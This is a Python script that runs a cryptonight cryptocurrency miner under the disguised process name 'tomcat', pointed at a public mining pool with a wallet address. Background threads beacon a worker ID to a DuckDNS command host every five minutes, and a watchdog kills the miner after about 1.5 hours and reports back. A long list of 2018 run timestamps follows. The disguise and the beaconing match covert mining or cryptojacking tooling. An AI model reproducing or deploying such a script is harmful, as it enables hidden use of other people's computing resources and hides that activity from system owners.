import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:06.600271
#2018-02-17 17:36:01.612994
#2018-02-17 19:23:05.237285
#2018-02-17 21:14:01.660235
#2018-02-17 22:58:01.946135
#2018-02-18 00:44:06.644556
#2018-02-18 02:33:01.259531
#2018-02-18 04:20:07.939888
#2018-02-18 06:11:04.079396
#2018-02-18 08:00:09.846391
#2018-02-18 09:48:03.477888
#2018-02-18 11:35:03.432065
#2018-02-18 13:20:01.673569
#2018-02-18 15:10:01.421211
#2018-02-18 16:58:02.163408
#2018-02-18 18:46:06.164033
#2018-02-18 20:32:07.682252
#2018-02-18 22:17:07.212765
#2018-02-19 00:07:06.833292
#2018-02-19 01:54:01.580314
#2018-02-19 03:40:09.159385
#2018-02-19 05:25:07.273902
#2018-02-19 07:12:05.690035
#2018-02-19 09:01:06.785725
#2018-02-19 10:49:05.525927
#2018-02-19 12:37:01.287782
#2018-02-19 14:24:08.822458
#2018-02-19 16:12:07.278219
#2018-02-19 18:00:01.653979
#2018-02-19 19:47:01.455996
#2018-02-19 21:36:06.460720
#2018-02-19 23:22:05.726578
#2018-02-20 01:08:04.904242
#2018-02-20 02:57:06.178930
#2018-02-20 04:46:04.082547
#2018-02-20 06:30:10.307809
#2018-02-20 08:15:03.724675
#2018-02-20 10:00:05.405424
#2018-02-20 11:44:01.265553
#2018-02-20 13:32:06.075665
#2018-02-20 15:15:11.822123
#2018-02-20 16:59:07.067693
#2018-02-20 18:46:10.629056
#2018-02-20 20:38:06.432223
#2018-02-20 22:23:02.188407
#2018-02-21 00:05:02.099844
#2018-02-21 01:51:01.312084
#2018-02-21 03:41:07.992704
#2018-02-21 05:29:05.984997
#2018-02-21 07:17:01.677201
#2018-02-21 09:02:01.690961
#2018-02-21 10:50:04.212036
#2018-02-21 12:36:05.954800
#2018-02-21 14:23:06.528093
#2018-02-21 16:11:08.793114
#2018-02-21 18:01:09.342698
#2018-02-21 19:49:07.373985
#2018-02-21 21:37:01.591255
#2018-02-21 23:23:06.227282
#2018-02-22 01:12:04.605412
#2018-02-22 02:58:06.261930
#2018-02-22 04:45:04.021754
#2018-02-22 06:30:09.843689
#2018-02-22 08:17:06.843692
#2018-02-22 10:05:07.719592
#2018-02-22 11:49:13.337873
#2018-02-22 13:35:10.086635
#2018-02-22 15:23:01.750144
#2018-02-22 17:08:09.740816
#2018-02-22 18:56:08.049811
#2018-02-22 20:49:02.104004
#2018-02-22 22:36:06.896125
#2018-02-23 00:23:01.953517
#2018-02-23 02:10:09.633622
#2018-02-23 03:53:04.489160
#2018-02-23 05:31:05.946825
#2018-02-23 07:16:07.903315
#2018-02-23 09:21:01.951164
#2018-02-23 11:27:01.954111
#2018-02-23 13:17:08.144395
#2018-02-23 15:04:07.953584
#2018-02-23 16:53:05.166477
#2018-02-23 18:41:08.641854
#2018-02-23 20:29:05.550674
#2018-02-23 22:16:05.821222
#2018-02-24 00:01:05.830117
#2018-02-24 01:51:05.152388
#2018-02-24 03:39:01.713050
#2018-02-24 05:22:07.976301
#2018-02-24 07:10:06.474204
#2018-02-24 08:58:02.046922
#2018-02-24 10:38:03.423003
#2018-02-24 12:24:05.754327
#2018-02-24 14:18:04.119238
#2018-02-24 16:04:01.779493
#2018-02-24 17:56:01.649757
#2018-02-24 19:43:04.169482
#2018-02-24 21:30:07.577764
#2018-02-25 00:15:06.500552
#2018-02-25 04:27:04.857147
#2018-02-25 08:09:01.273281